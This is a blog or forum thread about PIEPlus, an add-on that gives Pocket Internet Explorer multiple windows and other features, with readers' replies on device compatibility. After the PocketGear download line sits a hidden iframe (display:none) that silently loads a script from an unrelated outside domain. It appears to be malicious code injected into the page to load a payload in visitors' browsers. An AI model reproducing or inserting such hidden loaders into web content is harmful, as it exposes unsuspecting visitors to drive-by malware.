PIEPlus - In Search of the Best Pocket PC Phone Browser

I have tried many of the browsers that are out there for Pocket PCs, Thunderhawk, NetFront, etc. I seem to keep ending up back using Pocket Internet Explorer (PIE) a lot, because its there by default and doesn't take up any memory. With all the testing and device switching, I end up reloading my pdaPhone a lot, and so sometimes I don't get to reloading a browser program.

My biggest complaint about PIE is that you can't open multiple windows. This something I do a lot, and without this function you must keep reloading the same pages, which takes a lot of time over the air.

Reensoft has just released a product that might help my problem and yours ... if you use PIE. Essentially, they have made PIE do what Microsoft should have made it do a long time ago. I haven't had a chance to try this out yet, but he feature list looks pretty good. If you try it, let us know what you think. Here is a list of its features:
  • Optimize the web contents to fit for PIE
  • Open multiple PIE windows
  • Fullscreen mode
  • Extended context menu
  • Identify PIE as IE5.5 or IE6.0
  • Set default charset
  • Enable/disable script and script warning
  • Enable/disable ClearType

You can download a trial or buy PIEPlus at PocketGear. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

There's a thread about the PIEPlus on the i700 forum which ended up with the conclusion that this is not compatible with the i700 and that we would need to wait for a later version that would work for the i700. Does this work with other PPC phones?

Here's the link to the i700 thread:

ftxPBrowser was my favorite by far, but doesn't work properly with PPC 2003. I used to use Multi IE, but that also is not 2003 compatible, and the author won't even answer e-mail about compatibility in the future. PIEPlus says it's not 2003 compatible.

I'm dying without my multi-tab or multi-window browsing, any other ideas/options?

I've run a short test on the G1000 and this thing works pretty well so far. I looked at half a dozen full screen sites that are pretty busy. You can flip between standard view and pocket view. What a difference. It stacks everything up so you can use the jogdial to scroll up and down.... very cool. And it seems to work well switching between windows. I had used ftxPBrowser for a while and found it to be a bit confusing on how to handle the windows... I kept ending up with a ton of windows. PIEPlus is very intuitive. I'll plan on doing a review of it in a week or so.

Why of course! The amazing thing is that Microsoft wouldn't have updated PIE to handle multiple windows in all these years... pitiful.

They still don't have tabs in IE, so no shock to me. IE in any flavor is barely usable for light browsing.
